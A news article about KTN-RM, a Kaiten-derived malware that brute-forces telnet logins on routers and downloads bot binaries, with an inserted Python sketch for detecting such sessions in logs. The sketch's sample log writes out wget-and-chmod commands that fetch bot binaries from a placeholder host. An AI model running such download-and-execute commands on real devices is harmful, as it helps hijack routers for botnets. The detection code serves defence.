Infosec miscreants are peddling malware that will KO your router
And it's got a nasty surprise in store if you try and kill it
Malware targeting embedded devices such as routers rather than computers is doing the rounds.
A new and improved version of Kaiten, an Internet Relay Chat (IRC)-controlled malware typically used to carry out distributed denial-of-service (DDoS) attacks, is spreading, security firm ESET warns.
KTN-Remastered, or KTN-RM, features an improved spreading mechanism compared to its predecessor: it carries downloader-executable binaries for embedded platforms such as routers and other connected devices, including gateways and wireless access points.
The malware uses Linux/Gafgyt’s telnet scanning to hunt for routers before seeking to guess login credentials in order to commandeer weakly-secured routers and the like. If it successfully logs in, it will issue a shell command to download bot executable files for multiple architectures before running them on the compromised networking kit.
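The sequence described above (guessed telnet logins, then a shell command that pulls bot binaries for several architectures) leaves a recognisable trace in telnet honeypot or device session logs. The following detection sketch is an added example, not code from ESET or from this article; the log format, event names, addresses and file names are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample log, hypothetical format: "<time> <src_ip> <event> <detail>".
# Addresses are from the documentation ranges; file names are made up.
SAMPLE_LOG = """\
12:00:01 198.51.100.7 LOGIN_FAIL root:root
12:00:02 198.51.100.7 LOGIN_FAIL admin:admin
12:00:03 198.51.100.7 LOGIN_OK admin:1234
12:00:04 198.51.100.7 CMD cd /tmp; wget http://203.0.113.9/bot.mips; chmod +x bot.mips
12:00:05 198.51.100.7 CMD wget http://203.0.113.9/bot.arm; chmod +x bot.arm
12:05:00 192.0.2.44 LOGIN_FAIL admin:admin
12:05:09 192.0.2.44 LOGIN_OK admin:S3cure-Example
12:05:30 192.0.2.44 CMD show interfaces
"""

# One download invocation, up to the next shell separator.
FETCH = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b[^;|&]*", re.I)
# Architecture tags commonly seen in names of cross-compiled binaries.
ARCH = re.compile(r"\b(mipsel|mips|armv?\d*|x86(?:_64)?|i\d86|ppc|powerpc|sh4|sparc|m68k)\b", re.I)

def flag_sessions(log_text, min_archs=2):
    """Return {src_ip: [archs]} for sources that failed at least one login,
    then logged in and fetched binaries for >= min_archs architectures."""
    state = defaultdict(lambda: {"fails": 0, "ok": False, "archs": set()})
    for line in log_text.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) < 4:
            continue  # skip malformed lines
        _, src, event, detail = parts
        s = state[src]
        if event == "LOGIN_FAIL":
            s["fails"] += 1
        elif event == "LOGIN_OK":
            s["ok"] = True
        elif event == "CMD" and s["ok"]:
            # Only look for architecture tags inside download commands.
            for fetch in FETCH.findall(detail):
                s["archs"].update(a.lower() for a in ARCH.findall(fetch))
    return {ip: sorted(s["archs"]) for ip, s in state.items()
            if s["fails"] >= 1 and len(s["archs"]) >= min_archs}

if __name__ == "__main__":
    for ip, archs in flag_sessions(SAMPLE_LOG).items():
        print(f"{ip}: multi-architecture download after guessed login: {archs}")
```

The administrator session from 192.0.2.44 is not flagged because it issues no download commands, which is the distinction the multi-architecture check is there to make.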
The malware, which zombifies Linux networking kit, combines capabilities of two previous versions of bots, according to ESET, who have identified three variants of the new and improved strain thus far.
The malware also has a message for those who might try to neutralise its threat.
“Within the welcome message, version 2.0 seems to single out malwaremustdie.org which has published extensive details about Gafgyt, Tsunami and other members of this family of Malware,” explained Michal Malík, a malware researcher at ESET.
ESET’s blog post describes the malware in more detail. ®